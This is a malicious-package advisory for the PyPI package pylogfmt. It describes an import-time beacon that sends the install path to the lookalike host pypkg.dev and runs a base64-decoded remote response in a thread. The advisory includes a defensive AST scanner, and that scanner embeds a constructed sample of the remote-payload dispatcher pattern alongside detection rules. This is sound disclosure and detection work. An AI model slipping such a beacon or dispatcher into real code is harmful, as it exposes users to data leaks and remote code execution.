MAL-2026-4231
Malicious code in pylogfmt (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34bc39125496330ed9b38f1f6d7f06db7e150d83144f9d7e1e04552112851c4a)

On `import pylogfmt`, the package's __init__.py spawns a detached background subprocess (`subprocess.Popen([sys.executable, '_check.py'], stdout=DEVNULL, stderr=DEVNULL)`) that runs an infinite loop POSTing the package install path to https://pypkg.dev/project/pylogfmt/json every 60 seconds with TLS verification explicitly disabled. The HTTP response body is base64-decoded and dispatched to a worker thread (`threading.Thread(target=check, args=(package_list.decode(),))`), which is the canonical remote-payload-dispatcher shape: the operator controls the returned bytes and the client decodes them and feeds them into a handler. The destination domain pypkg.dev is a lookalike of pypi.org/pypa with no relation to the package's declared logging-library purpose. Output suppression (DEVNULL on both streams), undocumented behavior (the README advertises only a logging helper), TLS bypass, and a lookalike C2 destination together are unambiguous attack signals. Any consumer that imports pylogfmt as a library leaks its install path to attacker infrastructure on a 60-second polling interval and is one server-side change away from arbitrary remote code execution.

## Source: kam193 (ba18f7e82fa8d07985ef44f6ce5a8d4b7759f2e348b6ba073bba4dd463740d8e)

Package silently executes remote code during import.
---
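The signals the amazon-inspector detail above lists (a subprocess with both streams silenced, `verify=False`, a base64-decoded response body handed to a thread, and a destination host that is not where a logging library has any business talking) can be checked for statically, by parsing the installed source rather than importing it, since the first `import` is what triggers the behaviour. The following is an added example written for this page, not code from the package or from either source: the module it scans is constructed to reproduce only the shape the detail describes, the handler body is unknown and left empty, and the function names (`scan_source`, `verdict`, `scan_package_dir`) and the host allowlist are assumptions.

```python
import ast
import pathlib
from urllib.parse import urlsplit

# Constructed sample reproducing only the shape the advisory describes; it is not
# pylogfmt's real source and is only ever parsed here, never executed.
SUSPECT_SRC = '''\
import sys, subprocess, threading, base64, requests, time
subprocess.Popen([sys.executable, '_check.py'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def check(blob):
    pass  # handler body unknown; whatever it does runs on operator-controlled bytes
while True:
    r = requests.post("https://pypkg.dev/project/pylogfmt/json", data={"p": __file__}, verify=False)
    package_list = base64.b64decode(r.content)
    threading.Thread(target=check, args=(package_list.decode(),)).start()
    time.sleep(60)
'''
# Constructed benign control: what a logging helper's module actually looks like.
BENIGN_SRC = '''\
import logging
def fmt(record):
    return "%s %s" % (record.levelname, record.getMessage())
'''
# Hosts a logging library could legitimately name (assumed allowlist, edit to taste).
ALLOWED_HOSTS = ("pypi.org", "files.pythonhosted.org")

def _dotted(node):
    """'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def _decoded_names(tree):
    """Variables assigned directly from a *.b64decode(...) call."""
    names = set()
    for n in ast.walk(tree):
        if (isinstance(n, ast.Assign) and isinstance(n.value, ast.Call)
                and _dotted(n.value.func).endswith("b64decode")):
            names.update(t.id for t in n.targets if isinstance(t, ast.Name))
    return names

def scan_source(src, allowed_hosts=ALLOWED_HOSTS):
    """Return {signal: [line numbers]} for the four signals the advisory lists."""
    tree = ast.parse(src)          # parse only: importing would trigger the behaviour
    decoded = _decoded_names(tree)
    found = {}
    for node in ast.walk(tree):
        # URL literal whose host is outside the allowlist: lookalike / off-site destination.
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and node.value.startswith(("http://", "https://"))
                and (urlsplit(node.value).hostname or "") not in allowed_hosts):
            found.setdefault("offsite_network_destination", []).append(node.lineno)
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        kw = {k.arg: k.value for k in node.keywords if k.arg}
        # Popen with both streams on DEVNULL: output suppression.
        if name.endswith("Popen") and all(
                s in kw and _dotted(kw[s]).endswith("DEVNULL") for s in ("stdout", "stderr")):
            found.setdefault("silenced_subprocess", []).append(node.lineno)
        # verify=False on any call: TLS bypass.
        v = kw.get("verify")
        if isinstance(v, ast.Constant) and v.value is False:
            found.setdefault("tls_verify_disabled", []).append(node.lineno)
        # Thread whose args reference a base64-decoded variable: remote bytes fed to a handler.
        if name.endswith("Thread") and "args" in kw and any(
                isinstance(n, ast.Name) and n.id in decoded for n in ast.walk(kw["args"])):
            found.setdefault("decoded_payload_to_thread", []).append(node.lineno)
    return {k: sorted(v) for k, v in found.items()}

def verdict(signals):
    """Decoded remote bytes reaching a handler plus an off-site destination is the
    dispatcher shape; any other hit is worth a look but is not proof on its own."""
    if "decoded_payload_to_thread" in signals and "offsite_network_destination" in signals:
        return "malicious"
    return "suspicious" if signals else "clean"

def scan_package_dir(path):
    """Scan every .py file under an installed package directory without importing it."""
    report = {}
    for p in pathlib.Path(path).rglob("*.py"):
        try:
            signals = scan_source(p.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if signals:
            report[str(p)] = signals
    return report

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_SRC), ("benign", BENIGN_SRC)):
        print(label, verdict(scan_source(src)), scan_source(src))
```

Run `scan_package_dir` against the package's directory under `site-packages` rather than anything that imports the module; each hit comes back with the line number so it can be confirmed by eye, and the allowlist is the one knob that needs adjusting per package, since a library that legitimately calls home will otherwise light up the destination signal.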
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-lognest
Reasons (based on the campaign):
- Downloads and executes a remote malicious script.
Affected packages
No fixed version has been published for pylogfmt (pip). Pin to a known-safe version or switch to an alternative; because the behaviour runs on import, remove the package from any environment where it is installed rather than leaving it in place unused.